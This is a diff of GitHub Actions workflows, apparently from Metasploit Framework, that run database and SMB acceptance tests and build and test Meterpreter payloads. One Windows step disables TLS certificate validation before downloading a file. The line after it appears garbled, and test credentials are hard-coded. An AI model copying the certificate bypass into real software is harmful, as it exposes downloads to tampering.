SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
RUNTIME_VERSION: ${{ env.RUNTIME_VERSION }}
# Unix run command:
# SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
# Windows cmd command:
# set SPEC_HELPER_LOAD_METASPLOIT=false
# bundle exec rspec .\spec\acceptance
# Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
# Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
run: |
bundle exec rspec spec/acceptance/mssql_spec.rb
- name: Archive results
if: always()
uses: actions/upload-artifact@v4
with:
# Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
name: ${{ env.DOCKER_IMAGE_FILENAME }}-${{ matrix.os }}
path: tmp/allure-raw-data
# Generate a final report from the previous test results
report:
name: Generate report
needs:
- mssql
runs-on: ubuntu-latest
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
if: always()
- name: Install system dependencies (Linux)
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
- name: Setup Ruby
if: always()
env:
BUNDLE_FORCE_RUBY_PLATFORM: true
uses: ruby/setup-ruby@v1
with:
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
cache-version: 4
- uses: actions/download-artifact@v4
id: download
if: always()
with:
# Note: Not specifying a name will download all artifacts from the previous workflow jobs
path: raw-data
- name: allure generate
if: always()
run: |
export VERSION=2.22.1
curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
tar -zxvf allure-$VERSION.tgz -C .
ls -la ${{steps.download.outputs.download-path}}
./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
find ${{steps.download.outputs.download-path}}
bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
- name: archive results
if: always()
uses: actions/upload-artifact@v4
with:
name: final-report-${{ github.run_id }}
path: |
./allure-report
+177
View File
@@ -0,0 +1,177 @@
name: MySQL Acceptance
# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
#concurrency:
# group: ${{ github.ref }}-${{ github.workflow }}
# cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
issues: none
discussions: none
packages: none
pages: none
pull-requests: none
repository-projects: none
security-events: none
statuses: none
on:
push:
branches-ignore:
- gh-pages
- metakitty
pull_request:
branches:
- '*'
paths:
- 'metsploit-framework.gemspec'
- 'Gemfile.lock'
- '**/**mysql**'
- 'spec/acceptance/**'
- 'spec/support/acceptance/**'
- 'spec/acceptance_spec_helper.rb'
- '.github/**'
# Example of running as a cron, to weed out flaky tests
# schedule:
# - cron: '*/15 * * * *'
jobs:
mysql:
runs-on: ${{ matrix.os }}
timeout-minutes: 60
services:
mysql:
image: ${{ matrix.target.version }}
ports: ["3306:3306"]
env:
MYSQL_ROOT_PASSWORD: password
options: >-
--health-cmd "${{ matrix.target.health_cmd }}"
--health-interval 10s
--health-timeout 10s
--health-retries 5
strategy:
fail-fast: true
matrix:
ruby:
- '3.2'
os:
- ubuntu-latest
target:
- { version: "mariadb:latest", health_cmd: "mariadb -uroot -ppassword -e 'SELECT version()'" }
- { version: "mysql:latest", health_cmd: "mysql -uroot -ppassword -e 'SELECT version()'" }
env:
RAILS_ENV: test
BUNDLE_WITHOUT: "coverage development pcap"
name: ${{ matrix.target.version }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
steps:
- name: Install system dependencies
run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
- name: Checkout code
uses: actions/checkout@v4
- name: Setup Ruby
env:
# Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
uses: ruby/setup-ruby@v1
with:
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
- name: Extract runtime version
run: |
echo "RUNTIME_VERSION=$(echo $DOCKER_IMAGE | awk -F: '{ print $2 }')" >> $GITHUB_ENV
echo "DOCKER_IMAGE_FILENAME=$(echo $DOCKER_IMAGE | tr -d ':')" >> $GITHUB_ENV
env:
DOCKER_IMAGE: ${{ matrix.target.version }}
OS: ${{ matrix.os }}
- name: acceptance
env:
SPEC_HELPER_LOAD_METASPLOIT: false
SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
RUNTIME_VERSION: ${{ env.RUNTIME_VERSION }}
# Unix run command:
# SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
# Windows cmd command:
# set SPEC_HELPER_LOAD_METASPLOIT=false
# bundle exec rspec .\spec\acceptance
# Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
# Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
run: |
bundle exec rspec spec/acceptance/mysql_spec.rb
- name: Archive results
if: always()
uses: actions/upload-artifact@v4
with:
# Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
name: ${{ env.DOCKER_IMAGE_FILENAME }}-${{ matrix.os }}
path: tmp/allure-raw-data
# Generate a final report from the previous test results
report:
name: Generate report
needs:
- mysql
runs-on: ubuntu-latest
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
if: always()
- name: Install system dependencies (Linux)
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
- name: Setup Ruby
if: always()
env:
BUNDLE_FORCE_RUBY_PLATFORM: true
uses: ruby/setup-ruby@v1
with:
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
cache-version: 4
- uses: actions/download-artifact@v4
id: download
if: always()
with:
# Note: Not specifying a name will download all artifacts from the previous workflow jobs
path: raw-data
- name: allure generate
if: always()
run: |
export VERSION=2.22.1
curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
tar -zxvf allure-$VERSION.tgz -C .
ls -la ${{steps.download.outputs.download-path}}
./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
find ${{steps.download.outputs.download-path}}
bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
- name: archive results
if: always()
uses: actions/upload-artifact@v4
with:
name: final-report-${{ github.run_id }}
path: |
./allure-report
+179
View File
@@ -0,0 +1,179 @@
name: Postgres Acceptance
# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
#concurrency:
# group: ${{ github.ref }}-${{ github.workflow }}
# cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
issues: none
discussions: none
packages: none
pages: none
pull-requests: none
repository-projects: none
security-events: none
statuses: none
on:
push:
branches-ignore:
- gh-pages
- metakitty
pull_request:
branches:
- '*'
paths:
- 'metsploit-framework.gemspec'
- 'Gemfile.lock'
- '**/**postgres**'
- 'spec/acceptance/**'
- 'spec/support/acceptance/**'
- 'spec/acceptance_spec_helper.rb'
- '.github/**'
# Example of running as a cron, to weed out flaky tests
# schedule:
# - cron: '*/15 * * * *'
jobs:
postgres:
runs-on: ${{ matrix.os }}
timeout-minutes: 60
services:
postgres:
image: ${{ matrix.docker_image }}
ports: ["5432:5432"]
env:
POSTGRES_USER: postgres
POSTGRES_PASSWORD: password
options: >-
--health-cmd "pg_isready --username postgres"
--health-interval 10s
--health-timeout 5s
--health-retries 5
strategy:
fail-fast: true
matrix:
ruby:
- '3.2'
os:
- ubuntu-latest
docker_image:
- postgres:9.4
- postgres:16.2
env:
RAILS_ENV: test
BUNDLE_WITHOUT: "coverage development pcap"
name: ${{ matrix.docker_image }} - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
steps:
- name: Install system dependencies
run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
- name: Checkout code
uses: actions/checkout@v4
- name: Setup Ruby
env:
# Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
uses: ruby/setup-ruby@v1
with:
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
- name: Extract runtime version
run: |
echo "RUNTIME_VERSION=$(echo $DOCKER_IMAGE | awk -F: '{ print $2 }')" >> $GITHUB_ENV
echo "DOCKER_IMAGE_FILENAME=$(echo $DOCKER_IMAGE | tr -d ':')" >> $GITHUB_ENV
env:
DOCKER_IMAGE: ${{ matrix.docker_image }}
OS: ${{ matrix.os }}
- name: acceptance
env:
SPEC_HELPER_LOAD_METASPLOIT: false
SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
RUNTIME_VERSION: ${{ env.RUNTIME_VERSION }}
# Unix run command:
# SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
# Windows cmd command:
# set SPEC_HELPER_LOAD_METASPLOIT=false
# bundle exec rspec .\spec\acceptance
# Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
# Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
run: |
bundle exec rspec spec/acceptance/postgres_spec.rb
- name: Archive results
if: always()
uses: actions/upload-artifact@v4
with:
# Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
name: ${{ env.DOCKER_IMAGE_FILENAME }}-${{ matrix.os }}
path: tmp/allure-raw-data
# Generate a final report from the previous test results
report:
name: Generate report
needs:
- postgres
runs-on: ubuntu-latest
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
if: always()
- name: Install system dependencies (Linux)
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
- name: Setup Ruby
if: always()
env:
BUNDLE_FORCE_RUBY_PLATFORM: true
uses: ruby/setup-ruby@v1
with:
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
cache-version: 4
- uses: actions/download-artifact@v4
id: download
if: always()
with:
# Note: Not specifying a name will download all artifacts from the previous workflow jobs
path: raw-data
- name: allure generate
if: always()
run: |
export VERSION=2.22.1
curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
tar -zxvf allure-$VERSION.tgz -C .
ls -la ${{steps.download.outputs.download-path}}
./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
find ${{steps.download.outputs.download-path}}
bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
- name: archive results
if: always()
uses: actions/upload-artifact@v4
with:
name: final-report-${{ github.run_id }}
path: |
./allure-report
@@ -0,0 +1,384 @@
name: Shared Meterpreter Acceptance
on:
workflow_call:
inputs:
# Defaults set as '' will use the current branch as their commit
metasploit_framework_commit:
description: "metasploit-framework commit to build with"
default: ''
required: false
type: string
metasploit_payloads_commit:
description: "metasploit-payloads commit to build with"
default: ''
required: false
type: string
mettle_commit:
description: "mettle commit to build with"
default: ''
required: false
type: string
build_mettle:
description: "Whether or not to build mettle"
default: false
required: false
type: boolean
build_metasploit_payloads:
description: "Whether or not to build metasploit-payloads"
default: false
required: false
type: boolean
jobs:
# Compile the Meterpreter payloads via docker if required, we can't always do this on the
# host environment (i.e. for macos). So it instead gets compiled first on a linux
# host, then the artifacts are copied back to the host later
meterpreter_compilation:
name: Compile Meterpreter
runs-on: ubuntu-latest
if: ${{ inputs.build_metasploit_payloads }}
steps:
- name: Checkout metasploit-payloads
uses: actions/checkout@v4
with:
repository: rapid7/metasploit-payloads
path: metasploit-payloads
ref: ${{ inputs.metasploit_payloads_commit }}
- name: Build Meterpreter payloads
run: |
mkdir $(pwd)/meterpreter-artifacts
docker run --rm -w $(pwd) -v $(pwd):$(pwd) rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "cd metasploit-payloads/gem && rake create_dir && rake win_copy && rake php_prep && rake java_prep && rake python_prep && rake create_manifest && rake build"
cp $(pwd)/metasploit-payloads/gem/pkg/metasploit-payloads-* $(pwd)/meterpreter-artifacts
- name: Store Meterpreter artifacts
uses: actions/upload-artifact@v4
with:
name: meterpreter-artifacts
path: meterpreter-artifacts
# Run all test individually, note there is a separate final job for aggregating the test results
test:
needs: meterpreter_compilation
if: always() && (needs.meterpreter_compilation.result == 'success' || needs.meterpreter_compilation.result == 'skipped')
strategy:
fail-fast: false
matrix:
os:
- macos-13
- windows-2019
- ubuntu-20.04
ruby:
- '3.2'
meterpreter:
# Python
- { name: python, runtime_version: 3.6 }
- { name: python, runtime_version: 3.11 }
# Java
- { name: java, runtime_version: 8 }
- { name: java, runtime_version: 21 }
# PHP
- { name: php, runtime_version: 5.3 }
- { name: php, runtime_version: 7.4 }
- { name: php, runtime_version: 8.3 }
include:
# Windows Meterpreter
- { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
- { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
# Mettle
- { meterpreter: { name: mettle }, os: macos-13 }
- { meterpreter: { name: mettle }, os: ubuntu-20.04 }
runs-on: ${{ matrix.os }}
timeout-minutes: 50
env:
RAILS_ENV: test
HOST_RUNNER_IMAGE: ${{ matrix.os }}
SESSION: 'meterpreter/${{ matrix.meterpreter.name }}'
SESSION_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
BUNDLE_WITHOUT: "coverage development"
name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
steps:
- name: Install system dependencies (Linux)
if: runner.os == 'Linux'
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
- uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
if: ${{ matrix.meterpreter.name == 'php' }}
with:
php-version: ${{ matrix.meterpreter.runtime_version }}
tools: none
- name: Set up Python
if: ${{ matrix.meterpreter.name == 'python' }}
uses: actions/setup-python@v5
with:
python-version: ${{ matrix.meterpreter.runtime_version }}
- uses: actions/setup-java@v4
if: ${{ matrix.meterpreter.name == 'java' }}
with:
distribution: temurin
java-version: ${{ matrix.meterpreter.runtime_version }}
- name: Install system dependencies (Windows)
shell: cmd
if: runner.os == 'Windows'
run: |
REM pcap dependencies
powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
choco install 7zip.installServerCertificateValidationCallback
7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
dir C:\\
dir %WINDIR%
type %WINDIR%\\system32\\drivers\\etc\\hosts
# The job checkout structure is:
# .
# ├── metasploit-framework
# └── metasploit-payloads (Only if the "payload-testing-branch" GitHub label is applied)
# └── mettle (Only if the "payload-testing-mettle-branch" GitHub label is applied)
- name: Checkout mettle
if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
uses: actions/checkout@v4
with:
repository: rapid7/mettle
path: mettle
ref: ${{ inputs.mettle_commit }}
- name: Get mettle version
if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
run: echo "METTLE_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" lib/metasploit_payloads/mettle/version.rb)" | tee -a $GITHUB_ENV
working-directory: mettle
- name: Prerequisite mettle gem setup
if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
run: |
set -x
ruby -pi.bak -e "gsub(/${{ env.METTLE_VERSION }}/, '${{ env.METTLE_VERSION }}-dev')" lib/metasploit_payloads/mettle/version.rb
working-directory: mettle
- name: Compile mettle payloads
if: ${{ matrix.meterpreter.name == 'mettle' && runner.os != 'macos' && inputs.build_mettle }}
run: |
docker run --rm=true --tty --volume=$(pwd):/mettle --workdir=/mettle rapid7/build:mettle rake mettle:build mettle:check
rake build
working-directory: mettle
- name: Compile mettle payloads - macOS
if: ${{ matrix.meterpreter.name == 'mettle' && runner.os == 'macos' && inputs.build_mettle }}
run: |
make TARGET=x86_64-apple-darwin
rake build
working-directory: mettle
- name: Checkout metasploit-framework commit
uses: actions/checkout@v4
with:
repository: rapid7/metasploit-framework
path: metasploit-framework
ref: ${{ inputs.metasploit_framework_commit }}
- name: Setup Ruby
env:
BUNDLE_FORCE_RUBY_PLATFORM: true
# Required for macos13 pg gem compilation
PKG_CONFIG_PATH: "/usr/local/opt/libpq/lib/pkgconfig"
uses: ruby/setup-ruby@v1
with:
ruby-version: ${{ matrix.ruby }}
bundler-cache: true
cache-version: 5
working-directory: metasploit-framework
- name: Move mettle gem into framework
if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
run: |
cp ../mettle/pkg/metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem .
working-directory: metasploit-framework
- uses: actions/download-artifact@v4
name: Download Meterpreter
id: download_meterpreter
if: ${{ matrix.meterpreter.name != 'mettle' && inputs.build_metasploit_payloads }}
with:
# Note: Not specifying a name will download all artifacts from the previous workflow jobs
path: raw-data
- name: Extract Meterpreter (Unix)
if: ${{ matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' && inputs.build_metasploit_payloads }}
shell: bash
run: |
set -x
download_path=${{steps.download_meterpreter.outputs.download-path}}
cp -r $download_path/meterpreter-artifacts/* ./metasploit-framework
- name: Extract Meterpreter (Windows)
if: ${{ matrix.meterpreter.name != 'mettle' && runner.os == 'Windows' && inputs.build_metasploit_payloads }}
shell: bash
run: |
set -x
download_path=$(cygpath -u '${{steps.download_meterpreter.outputs.download-path}}')
cp -r $download_path/meterpreter-artifacts/* ./metasploit-framework
- name: Install mettle gem
if: ${{ matrix.meterpreter.name == 'mettle' && inputs.build_mettle }}
run: |
set -x
bundle exec gem install metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem
ruby -pi.bak -e "gsub(/'metasploit_payloads-mettle', '.*'/, '\'metasploit_payloads-mettle\', \'${{ env.METTLE_VERSION }}.pre.dev\'')" metasploit-framework.gemspec
bundle config unset deployment
bundle update metasploit_payloads-mettle
bundle install
working-directory: metasploit-framework
- name: Checkout metasploit-payloads
if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
uses: actions/checkout@v4
with:
repository: rapid7/metasploit-payloads
path: metasploit-payloads
ref: ${{ inputs.metasploit_payloads_commit }}
- name: Build Windows payloads via Visual Studio 2019 Build (Windows)
shell: cmd
if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2019' && inputs.build_metasploit_payloads }}
run: |
cd c/meterpreter
git submodule init && git submodule update
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat
working-directory: metasploit-payloads
- name: Build Windows payloads via Visual Studio 2022 Build (Windows)
shell: cmd
if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && inputs.build_metasploit_payloads }}
run: |
cd c/meterpreter
git submodule init && git submodule update
make.bat
working-directory: metasploit-payloads
- name: Get metasploit-payloads version
if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
shell: bash
run: echo "METASPLOIT_PAYLOADS_VERSION=$(ruby -ne "puts Regexp.last_match(1) if /VERSION\s+=\s+'([^']+)'/" gem/lib/metasploit-payloads/version.rb)" | tee -a $GITHUB_ENV
working-directory: metasploit-payloads
- name: Install metasploit-payloads gem
if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
run: |
bundle exec gem install metasploit-payloads-${{ env.METASPLOIT_PAYLOADS_VERSION }}.gem
working-directory: metasploit-framework
- name: Remove metasploit-payloads version from metasploit-framework.gemspec
if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' && runner.os != 'Windows' }}
run: |
ruby -pi -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
working-directory: metasploit-framework
- name: Remove metasploit-payloads version from metasploit-framework.gemspec (Windows)
if: ${{ inputs.build_metasploit_payloads && (runner.os == 'Windows' && matrix.meterpreter.name != 'windows_meterpreter') && matrix.meterpreter.name != 'mettle' }}
shell: cmd
run: |
ruby -pi.bak -e "gsub(/metasploit-payloads', '\d+.\d+.\d+/, 'metasploit-payloads')" metasploit-framework.gemspec
working-directory: metasploit-framework
- name: Bundle update/install metasploit-payloads gem
if: ${{ inputs.build_metasploit_payloads && matrix.meterpreter.name != 'mettle' }}
run: |
bundle config unset deployment
bundle update metasploit-payloads
bundle install
working-directory: metasploit-framework
- name: Acceptance
env:
SPEC_HELPER_LOAD_METASPLOIT: false
SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
# Unix run command:
# SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
# Windows cmd command:
# set SPEC_HELPER_LOAD_METASPLOIT=false
# bundle exec rspec .\spec\acceptance
# Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
# Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
run: |
bundle exec rspec spec/acceptance/meterpreter_spec.rb
working-directory: metasploit-framework
- name: Archive results
if: always()
uses: actions/upload-artifact@v4
with:
# Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
path: metasploit-framework/tmp/allure-raw-data
# Generate a final report from the previous test results
report:
name: Generate report
needs: [test]
runs-on: ubuntu-latest
if: always() && needs.test.result != 'skipped'
steps:
- name: Checkout code
uses: actions/checkout@v4
if: always()
with:
repository: rapid7/metasploit-framework
ref: ${{ inputs.metasploit_framework_commit }}
- name: Install system dependencies (Linux)
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
- name: Setup Ruby
if: always()
env:
BUNDLE_FORCE_RUBY_PLATFORM: true
uses: ruby/setup-ruby@v1
with:
ruby-version: '3.3'
bundler-cache: true
cache-version: 5
- uses: actions/download-artifact@v4
id: raw_report_data
if: always()
with:
# Note: Not specifying a name will download all artifacts from the previous workflow jobs
path: raw-data
- name: allure generate
if: always()
run: |
export VERSION=2.22.1
curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
tar -zxvf allure-$VERSION.tgz -C .
ls -la ${{steps.raw_report_data.outputs.download-path}}
./allure-$VERSION/bin/allure generate ${{steps.raw_report_data.outputs.download-path}}/* -o ./allure-report
find ${{steps.raw_report_data.outputs.download-path}}
bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.raw_report_data.outputs.download-path}} > ./allure-report/support_matrix.html
- name: archive results
if: always()
uses: actions/upload-artifact@v4
with:
name: final-report-${{ github.run_id }}
path: |
./allure-report
+185
View File
@@ -0,0 +1,185 @@
name: Shared SMB Acceptance
on:
workflow_call:
inputs:
# Defaults set as '' will use the current branch as their commit
metasploit_framework_commit:
description: "metasploit-framework commit to build with"
default: ''
required: false
type: string
build_smb:
description: "Whether or not to build ruby_smb"
default: false
required: false
type: boolean
jobs:
smb:
runs-on: ${{ matrix.os }}
timeout-minutes: 60
strategy:
fail-fast: true
matrix:
ruby:
- '3.2'
os:
- ubuntu-latest
env:
RAILS_ENV: test
SMB_USERNAME: acceptance_tests_user
SMB_PASSWORD: acceptance_tests_password
BUNDLE_WITHOUT: "coverage development pcap"
name: SMB Acceptance - ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
steps:
# The job checkout structure is:
# .
# ├── metasploit-framework
# └── ruby_smb
- name: Checkout ruby_smb
uses: actions/checkout@v4
with:
repository: rapid7/ruby_smb
path: ruby_smb
- name: Get ruby_smb version
if: ${{ inputs.build_smb }}
run: |
echo "RUBY_SMB_VERSION=$(grep -oh '[0-9].[0-9].[0-9]*' lib/ruby_smb/version.rb)" | tee -a $GITHUB_ENV
working-directory: ruby_smb
- name: Build ruby_smb gem
if: ${{ inputs.build_smb }}
run: |
gem build ruby_smb.gemspec
working-directory: ruby_smb
- name: Install system dependencies
run: sudo apt-get install -y --no-install-recommends libpcap-dev graphviz
- name: Checkout metasploit-framework code
uses: actions/checkout@v4
with:
repository: rapid7/metasploit-framework
path: metasploit-framework
ref: ${{ inputs.metasploit_framework_commit }}
- name: Run docker container
working-directory: 'metasploit-framework'
run: |
cd test/smb
docker compose build
docker compose up --wait -d
- name: Setup Ruby
env:
# Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
BUNDLE_FORCE_RUBY_PLATFORM: "${{ contains(matrix.ruby, 'preview') && 'true' || 'false' }}"
uses: ruby/setup-ruby@v1
with:
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
working-directory: 'metasploit-framework'
- name: Copy ruby_smb gem into metasploit-framework
if: ${{ inputs.build_smb }}
run: |
cp ../ruby_smb/ruby_smb-${{ env.RUBY_SMB_VERSION }}.gem .
working-directory: metasploit-framework
- name: Install ruby_smb gem
if: ${{ inputs.build_smb }}
run: |
bundle exec gem install ruby_smb-${{ env.RUBY_SMB_VERSION }}.gem
bundle config unset deployment
bundle update ruby_smb
bundle install
working-directory: metasploit-framework
- name: acceptance
env:
SPEC_HELPER_LOAD_METASPLOIT: false
SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
RUNTIME_VERSION: 'latest'
# Unix run command:
# SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
# Windows cmd command:
# set SPEC_HELPER_LOAD_METASPLOIT=false
# bundle exec rspec .\spec\acceptance
# Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
# Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
run: |
bundle exec rspec spec/acceptance/smb_spec.rb
working-directory: metasploit-framework
- name: Archive results
if: always()
uses: actions/upload-artifact@v4
with:
# Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
name: smb_acceptance-${{ matrix.os }}
path: metasploit-framework/tmp/allure-raw-data
# Generate a final report from the previous test results
report:
name: Generate report
needs:
- smb
runs-on: ubuntu-latest
if: always()
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
repository: rapid7/metasploit-framework
path: metasploit-framework
ref: ${{ inputs.metasploit_framework_commit }}
- name: Install system dependencies (Linux)
if: always()
run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
- name: Setup Ruby
if: always()
env:
BUNDLE_FORCE_RUBY_PLATFORM: true
uses: ruby/setup-ruby@v1
with:
ruby-version: '${{ matrix.ruby }}'
bundler-cache: true
cache-version: 4
working-directory: metasploit-framework
- uses: actions/download-artifact@v4
id: download
if: always()
with:
# Note: Not specifying a name will download all artifacts from the previous workflow jobs
path: raw-data
- name: allure generate
if: always()
run: |
export VERSION=2.22.1
curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
tar -zxvf allure-$VERSION.tgz -C .
ls -la ${{steps.download.outputs.download-path}}
./allure-$VERSION/bin/allure generate ${{steps.download.outputs.download-path}}/* -o ./allure-report
find ${{steps.download.outputs.download-path}}
bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.download.outputs.download-path}} > ./allure-report/support_matrix.html
working-directory: metasploit-framework
- name: archive results
if: always()
uses: actions/upload-artifact@v4
with:
name: final-report-${{ github.run_id }}
path: |
./allure-report
+46
View File
@@ -0,0 +1,46 @@
name: SMB Acceptance
# Optional, enabling concurrency limits: https://docs.github.com/en/actions/using-jobs/using-concurrency
#concurrency:
# group: ${{ github.ref }}-${{ github.workflow }}
# cancel-in-progress: ${{ github.ref != 'refs/heads/main' }}
# https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#permissions
permissions:
actions: none
checks: none
contents: none
deployments: none
id-token: none
issues: none
discussions: none
packages: none
pages: none
pull-requests: none
repository-projects: none
security-events: none
statuses: none
on:
push:
branches-ignore:
- gh-pages
- metakitty
pull_request:
branches:
- '*'
paths:
- 'metsploit-framework.gemspec'
- 'Gemfile.lock'
- '**/**smb**'
- 'spec/acceptance/**'
- 'spec/support/acceptance/**'
- 'spec/acceptance_spec_helper.rb'
- '.github/**'
# Example of running as a cron, to weed out flaky tests
# schedule:
# - cron: '*/15 * * * *'
jobs:
build:
uses: ./.github/workflows/shared_smb_acceptance.yml
+10 -20
View File
@@ -29,23 +29,19 @@ on:
jobs:
build:
runs-on: ubuntu-latest
timeout-minutes: 40
timeout-minutes: 60
name: Docker Build
steps:
- name: Checkout code
uses: actions/checkout@v3
uses: actions/checkout@v4
- name: docker-compose build
run: |
curl -L https://github.com/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` > docker-compose
chmod +x docker-compose
sudo mv docker-compose /usr/bin
/usr/bin/docker-compose build
docker compose build
test:
runs-on: ${{ matrix.os }}
timeout-minutes: 40
timeout-minutes: 60
services:
postgres:
@@ -55,7 +51,7 @@ jobs:
